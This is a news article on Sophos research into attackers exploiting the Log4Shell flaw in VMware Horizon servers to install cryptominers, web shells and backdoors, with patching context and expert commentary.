VMware’s Horizon virtualization platform has become an ongoing target of attackers exploiting the high-profile Log4j flaw to install backdoors and cryptomining malware.
In a report this week, cybersecurity firm Sophos wrote that VMware’s virtual desktop and applications platform has been in the crosshairs since late December, with the largest wave of attacks beginning Jan. 19 and continuing well into March. Many of the attacks are designed to deploy cryptocurrency mining malware, Sophos researchers Gabor Szappanos and Sean Gallagher wrote.
Other motives were less clear, though some may be used by ransomware groups or initial access brokers, who gain access into targeted systems and then sell that access to threat actors to launch ransomware and other malware attacks.
VMware in late December released an updated version of Horizon and continued with patches for Horizon this month for the Log4j flaw – called Log4Shell and tracked as CVE-2021-44228 – but the threat continues.
“Attempts to compromise Horizon servers are among the more targeted exploits of Log4Shell vulnerabilities because of their nature,” the researchers wrote. “VMware has pushed out patched versions of Horizon as of March 8 2022, but many organizations may still not have deployed the fixed versions or applied workarounds to vulnerable ones. Even if they have, as demonstrated by the backdoors and reverse shell activity we found, those systems may already be compromised in other ways.”
The Log4j critical flaw exploded onto the scene late last year, with cybercriminals moving in quickly to exploit the vulnerability.
The threat from Log4Shell is significant – it has broad enterprise use in countless servers, cloud-based services and open-source projects like ElasticSearch and Elastic Logstash.
The open-source logging tool is so ubiquitous that it’s difficult for organizations to track down every instance in their IT environments. Log4Shell is also a flaw that is easy to exploit, with hackers only needing a string of malicious code to make their way into systems.
The attacks on Horizon also come as demand for such remote-work tools continues to grow in the wake of the COVID-19 pandemic, which forced most employees to work from home and has ushered in an expected era of more hybrid work.
“Organizations should thoroughly research their exposure to potential Log4J vulnerabilities, as they may impact commercial, open-source and custom software that in some cases may not have regular security support,” Szappanos and Gallagher wrote. “But platforms such as Horizon are particularly attractive targets to all types of malicious actors because they are widespread and can (if still vulnerable) easily be found and exploited with well-tested tools.”
According to Sophos, the attacks on VMware Horizon that started in January used the Lightweight Directory Access Protocol resource call in Log4j for a malicious Java class file that modified legitimate Java code. That added a web shell that delivered remote access and code execution capabilities to the attackers.
The initial attacks in late December 2021 and January of this year exploiting the Log4j flaw used Cobalt Strike malware. Other hackers didn’t use reverse-shell software, instead directly targeting the Tomcat server inside of Horizon.
Sophos said it had found a variety of payloads deployed to the targeted Horizon servers. Many were cryptominers, including z0Miner, JavaX miner and at least two variants of XMRig, called the “Jin” and “Mimu” miner bots.
“There were also several backdoors – including the Sliver implant, Atera agent and Splashtop Streamer (both legitimate software products being abused), and several PowerShell-based reverse shells,” the researchers wrote.
“While z0Miner, JavaX, and some other payloads were downloaded directly by the web shells used for initial compromise, the Jin bots were tied to use of Sliver, and used the same wallets as Mimo – suggesting these three malware were used by the same actor.”
There were also a number of backdoors deployed that used the Log4j flaw, including some PowerShell reverse shells. The motives of the bad actors using the reverse shells were unclear. One Sophos customer was hit by both reverse shells and the Mimu miner, but the researchers said that could be multiple infections by different hackers that were initially put in by an initial access broker.
Other cases showed more off-the-shelf backdoors being used to create a persistent presence in the targeted servers. That includes the Sliver implant, which the researchers described as an offensive security tool that was designed to be used by penetration testers and organizations’ red teams for training by mirroring tactics used by cybercriminals. Instead, threat actors use the software in their attacks.
Casey Ellis, founder and CTO at Bugcrowd, told The Register that cryptominers were among the first malicious actors to exploit Log4Shell after it became public.
“It’s a relatively simple and low-risk attack that works best with a large number of vulnerable endpoints in the attack surface,” Ellis said. “Cybercriminals are businesses in their own right, and combining cryptomining as a criminal monetization technique with a vulnerable package and the ubiquity of Log4j makes perfect sense.
“The primary consequences for an organization are CPU resource shortages caused by mining activity and, for those using the cloud, an unexpectedly high usage bill.”
In addition, because such attacks are simple to carry out, the threat actors using cryptomining range from individuals through ransomware-as-a-service gangs, initial access brokers and nation-states, which use cryptomining as a financing tool. ®